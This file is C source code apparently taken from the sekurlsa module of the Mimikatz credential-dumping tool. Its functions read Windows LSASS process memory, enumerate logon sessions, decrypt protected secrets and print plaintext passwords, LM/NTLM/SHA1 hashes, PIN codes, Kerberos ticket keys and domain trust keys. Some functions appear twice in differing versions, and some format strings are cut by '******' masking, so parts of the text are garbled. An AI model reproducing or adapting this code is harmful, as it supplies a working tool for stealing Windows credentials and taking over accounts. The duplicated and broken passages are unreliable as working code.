VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData) { KIWI_MSV1_0_CREDENTIALS credentials; KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {pCredentials, cLsass->hLsassMem}; while(aLsassMemory.address) { aLocalMemory.address = &credentials; if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS))) { aLsassMemory.address = credentials.PrimaryCredentials; while(aLsassMemory.address) { aLocalMemory.address = &primaryCredentials; if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS))) { aLsassMemory.address = primaryCredentials.Credentials.Buffer; if(kull_m_string_getUnicodeString(&primaryCredentials.Credentials, cLsass->hLsassMem)) { if(kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary, cLsass->hLsassMem)) { credCallback(&primaryCredentials, credentials.AuthenticationPackageId, &aLsassMemory, optionalData); LocalFree(primaryCredentials.Primary.Buffer); } LocalFree(primaryCredentials.Credentials.Buffer); } } else kprintf(L"n.e. (KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)"); aLsassMemory.address = primaryCredentials.next; } aLsassMemory.address = credentials.next; } else kprintf(L"n.e. (KIWI_MSV1_0_CREDENTIALS KO)"); } }
void kuhl_m_sekurlsa_kerberos_createExternalName(PKERB_EXTERNAL_NAME *pExternalName, PKULL_M_MEMORY_HANDLE hLSASS) { BOOL status = FALSE; KERB_EXTERNAL_NAME extName; PKERB_EXTERNAL_NAME pTempName; KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aName = {*pExternalName, hLSASS}, aLocalBuffer = {&extName, &hBuffer};//, aLocalStrings = {NULL, &hBuffer}; DWORD i; if(aName.address) { *pExternalName = NULL; if(kull_m_memory_copy(&aLocalBuffer, &aName, sizeof(KERB_EXTERNAL_NAME) - sizeof(UNICODE_STRING))) { i = sizeof(KERB_EXTERNAL_NAME) + (sizeof(UNICODE_STRING) * (extName.NameCount - 1)); if(pTempName = (PKERB_EXTERNAL_NAME) LocalAlloc(LPTR, i)) { *pExternalName = pTempName; aLocalBuffer.address = pTempName; if(status = kull_m_memory_copy(&aLocalBuffer, &aName, i)) for(i = 0; status && (i < pTempName->NameCount); i++) status = kull_m_string_getUnicodeString(&pTempName->Names[i], hLSASS); } } } }
PKIWI_KERBEROS_TICKET kuhl_m_sekurlsa_kerberos_createTicket(PBYTE pTicket, PKULL_M_MEMORY_HANDLE hLSASS) { BOOL status = FALSE; PKIWI_KERBEROS_TICKET ticket; if(ticket = (PKIWI_KERBEROS_TICKET) LocalAlloc(LPTR, sizeof(KIWI_KERBEROS_TICKET))) { ticket->StartTime = *(PFILETIME) (pTicket + kerbHelper[KerbOffsetIndex].offsetStartTime); ticket->EndTime = *(PFILETIME) (pTicket + kerbHelper[KerbOffsetIndex].offsetEndTime); ticket->RenewUntil = *(PFILETIME) (pTicket + kerbHelper[KerbOffsetIndex].offsetRenewUntil); ticket->ServiceName = *(PKERB_EXTERNAL_NAME *) (pTicket + kerbHelper[KerbOffsetIndex].offsetServiceName); kuhl_m_sekurlsa_kerberos_createExternalName(&ticket->ServiceName, hLSASS); ticket->DomainName = *(PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetDomainName); kull_m_string_getUnicodeString(&ticket->DomainName, hLSASS); ticket->TargetName = *(PKERB_EXTERNAL_NAME *) (pTicket + kerbHelper[KerbOffsetIndex].offsetTargetName); kuhl_m_sekurlsa_kerberos_createExternalName(&ticket->TargetName, hLSASS); ticket->TargetDomainName = *(PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetTargetDomainName); kull_m_string_getUnicodeString(&ticket->TargetDomainName, hLSASS); ticket->ClientName = *(PKERB_EXTERNAL_NAME *) (pTicket + kerbHelper[KerbOffsetIndex].offsetClientName); kuhl_m_sekurlsa_kerberos_createExternalName(&ticket->ClientName, hLSASS); ticket->AltTargetDomainName = *(PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetAltTargetDomainName); kull_m_string_getUnicodeString(&ticket->AltTargetDomainName, hLSASS); ticket->Description = *(PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetDescription); kull_m_string_getUnicodeString(&ticket->Description, hLSASS); ticket->KeyType = *(PULONG) ((pTicket + kerbHelper[KerbOffsetIndex].offsetKeyType)); ticket->Key = *(PKIWI_KERBEROS_BUFFER) ((pTicket + kerbHelper[KerbOffsetIndex].offsetKey));; kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(&ticket->Key, hLSASS); ticket->TicketFlags = *(PULONG) ((pTicket + kerbHelper[KerbOffsetIndex].offsetTicketFlags)); ticket->TicketEncType = *(PULONG) ((pTicket + kerbHelper[KerbOffsetIndex].offsetTicketEncType)); ticket->TicketKvno = *(PULONG) ((pTicket + kerbHelper[KerbOffsetIndex].offsetTicketKvno)); ticket->Ticket = *(PKIWI_KERBEROS_BUFFER) ((pTicket + kerbHelper[KerbOffsetIndex].offsetTicket));; kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(&ticket->Ticket, hLSASS); } return ticket; }
void kuhl_m_sekurlsa_trust_domaininfo(struct _KDC_DOMAIN_INFO * info) { if(kull_m_string_getUnicodeString(&info->FullDomainName, cLsass.hLsassMem)) { if(kull_m_string_getUnicodeString(&info->NetBiosName, cLsass.hLsassMem)) { kprintf(L"\nDomain: %wZ (%wZ", &info->FullDomainName, &info->NetBiosName); if(kull_m_string_getSid(&info->DomainSid, cLsass.hLsassMem)) { kprintf(L" / "); kull_m_string_displaySID(info->DomainSid); LocalFree(info->DomainSid); } kprintf(L")\n"); kuhl_m_sekurlsa_trust_domainkeys(&info->IncomingAuthenticationKeys, L" Out ", FALSE, &info->FullDomainName); // Input keys are for Out relation ship... kuhl_m_sekurlsa_trust_domainkeys(&info->OutgoingAuthenticationKeys, L" In ", TRUE, &info->FullDomainName); kuhl_m_sekurlsa_trust_domainkeys(&info->IncomingPreviousAuthenticationKeys, L"Out-1", FALSE, &info->FullDomainName); kuhl_m_sekurlsa_trust_domainkeys(&info->OutgoingPreviousAuthenticationKeys, L" In-1", TRUE, &info->FullDomainName); LocalFree(info->NetBiosName.Buffer); } LocalFree(info->FullDomainName.Buffer); } }
void kuhl_m_sekurlsa_trust_domainkeys(struct _KDC_DOMAIN_KEYS_INFO * keysInfo, PCWSTR prefix, BOOL incoming, PCUNICODE_STRING domain) { KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLsass = {keysInfo->keys, cLsass.hLsassMem}, aData = {NULL, &hBuffer}; DWORD i; PKDC_DOMAIN_KEYS domainKeys; if((keysInfo->keysSize && keysInfo->keys) || (keysInfo->password.Length && keysInfo->password.Buffer)) { kprintf(L"\n [%s] ", prefix); kprintf(incoming ? L"-> %wZ\n" : L"%wZ ->\n", domain); if(kull_m_string_getUnicodeString(&keysInfo->password, cLsass.hLsassMem)) { kprintf(L"\tfrom: "); if(kull_m_string_suspectUnicodeString(&keysInfo->password)) kprintf(L"%wZ", &keysInfo->password); else kull_m_string_wprintf_hex(keysInfo->password.Buffer, keysInfo->password.Length, 1); LocalFree(keysInfo->password.Buffer); } kprintf(L"\n"); if(keysInfo->keysSize && keysInfo->keys) { if(domainKeys = (PKDC_DOMAIN_KEYS) LocalAlloc(LPTR, keysInfo->keysSize)) { aData.address = domainKeys; if(kull_m_memory_copy(&aData, &aLsass, keysInfo->keysSize)) { for(i = 0; i < domainKeys->nbKeys; i++) { kprintf(L"\t* %s : ", kuhl_m_kerberos_ticket_etype(domainKeys->keys[i].type)); kull_m_string_wprintf_hex((PBYTE) domainKeys + domainKeys->keys[i].offset, domainKeys->keys[i].size, 0); kprintf(L"\n"); } } LocalFree(domainKeys); } } } }
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData) { KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData; ULONG nbListes = 1, i; PVOID pStruct; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory}; BOOL retCallback = TRUE; const KUHL_M_SEKURLSA_ENUM_HELPER * helper; NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); if(NT_SUCCESS(status)) { sessionData.cLsass = &cLsass; sessionData.lsassLocalHelper = lsassLocalHelper; if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_2K3) helper = &lsassEnumHelpers[0]; else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_VISTA) helper = &lsassEnumHelpers[1]; else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_7) helper = &lsassEnumHelpers[2]; else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8) helper = &lsassEnumHelpers[3]; else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) helper = &lsassEnumHelpers[5]; else helper = &lsassEnumHelpers[6]; if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000)) helper++; // yeah, really, I do that =) securityStruct.hMemory = cLsass.hLsassMem; if(securityStruct.address = LogonSessionListCount) kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG)); for(i = 0; i < nbListes; i++) { securityStruct.address = &LogonSessionList[i]; data.address = &pStruct; data.hMemory = &hLocalMemory; if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct)) { if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID))) { data.address = pStruct; data.hMemory = securityStruct.hMemory; while((data.address != securityStruct.address) && retCallback) { if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct)) { sessionData.LogonId = (PLUID) ((PBYTE) aBuffer.address + helper->offsetToLuid); sessionData.LogonType = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToLogonType)); sessionData.Session = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToSession)); sessionData.UserName = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername); sessionData.LogonDomain = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain); sessionData.pCredentials= *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentials); sessionData.pSid = *(PSID *) ((PBYTE) aBuffer.address + helper->offsetToPSid); sessionData.pCredentialManager = *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentialManager); sessionData.LogonTime = *((PFILETIME) ((PBYTE) aBuffer.address + helper->offsetToLogonTime)); sessionData.LogonServer = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToLogonServer); kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem); kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem); kull_m_string_getUnicodeString(sessionData.LogonServer, cLsass.hLsassMem); kull_m_string_getSid(&sessionData.pSid, cLsass.hLsassMem); retCallback = callback(&sessionData, pOptionalData); if(sessionData.UserName->Buffer) LocalFree(sessionData.UserName->Buffer); if(sessionData.LogonDomain->Buffer) LocalFree(sessionData.LogonDomain->Buffer); if(sessionData.LogonServer->Buffer) LocalFree(sessionData.LogonServer->Buffer); if(sessionData.pSid) LocalFree(sessionData.pSid); data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink; } else break; } } LocalFree(aBuffer.address); } } } return status; }
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags) { PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL; PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds; PMSV1_0_PRIMARY_CREDENTIAL_10 pPrimaryCreds10; PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds; PKERB_HASHPASSWORD_GENERIC pHashPassword; UNICODE_STRING buffer; PVOID base; DWORD type, i; if(mesCreds) { if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL) { type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK; credentials = (PUNICODE_STRING) mesCreds; if(credentials->Buffer) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) (*lsassLocalHelper->pLsaUnprotectMemory)(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length); switch(type) { case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY: pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer; kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE); kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE); kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName); if(pPrimaryCreds->isLmOwfPassword) { kprintf(L"\n\t * LM : "); kull_m_string_wprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0); } if(pPrimaryCreds->isNtOwfPassword) { kprintf(L"\n\t * NTLM : "); kull_m_string_wprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0); } if(pPrimaryCreds->isShaOwPassword) { kprintf(L"\n\t * SHA1 : "); kull_m_string_wprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0); } break; case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10: pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) credentials->Buffer; kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE); kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE); kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName); kprintf(L"\n\t * Flags : %02x/N%02x/L%02x/S%02x/%02x/%02x/%02x/%02x", pPrimaryCreds10->isUnk0, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword, pPrimaryCreds10->isUnk1, pPrimaryCreds10->isUnk2, pPrimaryCreds10->isUnk3, pPrimaryCreds10->isUnk4); if(pPrimaryCreds10->isLmOwfPassword) { kprintf(L"\n\t * LM : "); kull_m_string_wprintf_hex(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0); } if(pPrimaryCreds10->isNtOwfPassword) { kprintf(L"\n\t * NTLM : "); kull_m_string_wprintf_hex(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0); } if(pPrimaryCreds10->isShaOwPassword) { kprintf(L"\n\t * SHA1 : "); kull_m_string_wprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0); } kprintf(L"\n\t * unknow : "); kull_m_string_wprintf_hex(pPrimaryCreds10->UnkStruct, 128, 0); break; case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY: pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer; base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY); for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++) kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base); break; default: kprintf(L"\n\t * Raw data : "); kull_m_string_wprintf_hex(credentials->Buffer, credentials->Length, 1); } } } else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE) { if(mesCreds->UserName.Buffer) { if(kull_m_string_getUnicodeString(&mesCreds->UserName, cLsass.hLsassMem)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) (*lsassLocalHelper->pLsaUnprotectMemory)(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength); kprintf(L"\n\t * PIN code : %wZ", &mesCreds->UserName); LocalFree(mesCreds->UserName.Buffer); } } } else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST) { pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds; kprintf(L"\t %s ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type)); if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size) { buffer.Buffer = (PWSTR) pHashPassword->Checksump; if(kull_m_string_getUnicodeString(&buffer, cLsass.hLsassMem)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) (*lsassLocalHelper->pLsaUnprotectMemory)(buffer.Buffer, buffer.MaximumLength); kull_m_string_wprintf_hex(buffer.Buffer, buffer.Length, 0); LocalFree(buffer.Buffer); } } else kprintf(L"<no size, buffer is incorrect>"); kprintf(L"\n"); } else { if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer) { if(kull_m_string_getUnicodeString(&mesCreds->UserName, cLsass.hLsassMem) && kull_m_string_suspectUnicodeString(&mesCreds->UserName)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN)) username = &mesCreds->UserName; else domain = &mesCreds->UserName; } if(kull_m_string_getUnicodeString(&mesCreds->Domaine, cLsass.hLsassMem) && kull_m_string_suspectUnicodeString(&mesCreds->Domaine)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN)) domain = &mesCreds->Domaine; else username = &mesCreds->Domaine; } if(kull_m_string_getUnicodeString(&mesCreds->Password, cLsass.hLsassMem) /*&& !kull_m_string_suspectUnicodeString(&mesCreds->Password)*/) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) (*lsassLocalHelper->pLsaUnprotectMemory)(mesCreds->Password.Buffer, mesCreds->Password.MaximumLength); password = &mesCreds->Password; } if(password || !(flags & KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY)) { kprintf((flags & KUHL_SEKURLSA_CREDS_DISPLAY_LINE) ? L"%wZ\t%wZ\t" : L"\n\t * Username : %wZ" L"\n\t * Domain : %wZ" L"\n\t * Password : "******"%.*s", password->Length / sizeof(wchar_t), password->Buffer); else kprintf(L"%wZ", password); } else kull_m_string_wprintf_hex(password->Buffer, password->Length, 1); } LocalFree(mesCreds->UserName.Buffer); LocalFree(mesCreds->Domaine.Buffer); LocalFree(mesCreds->Password.Buffer); } } if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE) kprintf(L"\n"); } else kprintf(L"LUID KO\n"); }
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData) { PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL; PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds; PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds; PVOID base; DWORD type, i; if(mesCreds) { if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL) { type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK; credentials = (PUNICODE_STRING) mesCreds; if(credentials->Buffer) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) (*lsassLocalHelper->pLsaUnprotectMemory)(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length); switch(type) { case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY: pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer; kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE); kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE); if(externalCallback) externalCallback(luid, &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName, NULL, pPrimaryCreds->LmOwfPassword, pPrimaryCreds->NtOwfPassword, externalCallbackData); kprintf(L"\n\t * Username : %wZ" L"\n\t * Domain : %wZ" , &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName); kprintf(L"\n\t * LM : "); kull_m_string_wprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n\t * NTLM : "); kull_m_string_wprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n\t * SHA1 : "); kull_m_string_wprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0); break; case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY: pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer; base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY); for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++) kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base); break; default: kprintf(L"\n\t * Raw data : "); kull_m_string_wprintf_hex(credentials->Buffer, credentials->Length, 1); } } } else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE) { if(mesCreds->UserName.Buffer) { if(kull_m_string_getUnicodeString(&mesCreds->UserName, cLsass.hLsassMem)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) (*lsassLocalHelper->pLsaUnprotectMemory)(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength); kprintf(L"\n\t * PIN code : %wZ", &mesCreds->UserName); LocalFree(mesCreds->UserName.Buffer); } } } else { if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer) { if(kull_m_string_getUnicodeString(&mesCreds->UserName, cLsass.hLsassMem) && kull_m_string_suspectUnicodeString(&mesCreds->UserName)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN)) username = &mesCreds->UserName; else domain = &mesCreds->UserName; } if(kull_m_string_getUnicodeString(&mesCreds->Domaine, cLsass.hLsassMem) && kull_m_string_suspectUnicodeString(&mesCreds->Domaine)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN)) domain = &mesCreds->Domaine; else username = &mesCreds->Domaine; } if(kull_m_string_getUnicodeString(&mesCreds->Password, cLsass.hLsassMem) /*&& !kull_m_string_suspectUnicodeString(&mesCreds->Password)*/) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) (*lsassLocalHelper->pLsaUnprotectMemory)(mesCreds->Password.Buffer, mesCreds->Password.MaximumLength); password = &mesCreds->Password; } if(externalCallback) externalCallback(luid, username, domain, password, NULL, NULL, externalCallbackData); if(password || !(flags & KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY)) { kprintf((flags & KUHL_SEKURLSA_CREDS_DISPLAY_LINE) ? L"%wZ\t%wZ\t" : L"\n\t * Username : %wZ" L"\n\t * Domain : %wZ" L"\n\t * Password : "******"%wZ", password); else kull_m_string_wprintf_hex(password->Buffer, password->Length, 1); } LocalFree(mesCreds->UserName.Buffer); LocalFree(mesCreds->Domaine.Buffer); LocalFree(mesCreds->Password.Buffer); } } if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE) kprintf(L"\n"); } else kprintf(L"LUID KO\n"); }
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData) { KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData; ULONG nbListes = 0, i; PVOID pStruct; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory}; BOOL retCallback = TRUE; const KUHL_M_SEKURLSA_ENUM_HELPER * helper; NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); if(NT_SUCCESS(status)) { sessionData.cLsass = &cLsass; sessionData.lsassLocalHelper = lsassLocalHelper; if(cLsass.osContext.MajorVersion < 6) helper = &lsassEnumHelpers[0]; else if(cLsass.osContext.MinorVersion < 2) helper = &lsassEnumHelpers[1]; else if(cLsass.osContext.MinorVersion < 3) helper = &lsassEnumHelpers[2]; else helper = &lsassEnumHelpers[3]; securityStruct.hMemory = cLsass.hLsassMem; securityStruct.address = LogonSessionListCount; if(securityStruct.address) kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG)); else *(PULONG) data.address = 1; for(i = 0; i < nbListes; i++) { securityStruct.address = &LogonSessionList[i]; data.address = &pStruct; data.hMemory = &hLocalMemory; if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct)) { if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID))) { data.address = pStruct; data.hMemory = securityStruct.hMemory; while((data.address != securityStruct.address) && retCallback) { if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct)) { sessionData.LogonId = (PLUID) ((PBYTE) aBuffer.address + helper->offsetToLuid); sessionData.LogonType = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToLogonType)); sessionData.Session = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToSession)); sessionData.UserName = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername); sessionData.LogonDomain = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain); sessionData.pCredentials= *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentials); sessionData.pSid = *(PSID *) ((PBYTE) aBuffer.address + helper->offsetToPSid); kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem); kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem); kuhl_m_sekurlsa_utils_getSid(&sessionData.pSid, cLsass.hLsassMem); retCallback = callback(&sessionData, pOptionalData); LocalFree(sessionData.UserName->Buffer); LocalFree(sessionData.LogonDomain->Buffer); LocalFree(sessionData.pSid); data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink; } else break; } } LocalFree(aBuffer.address); } } } return status; }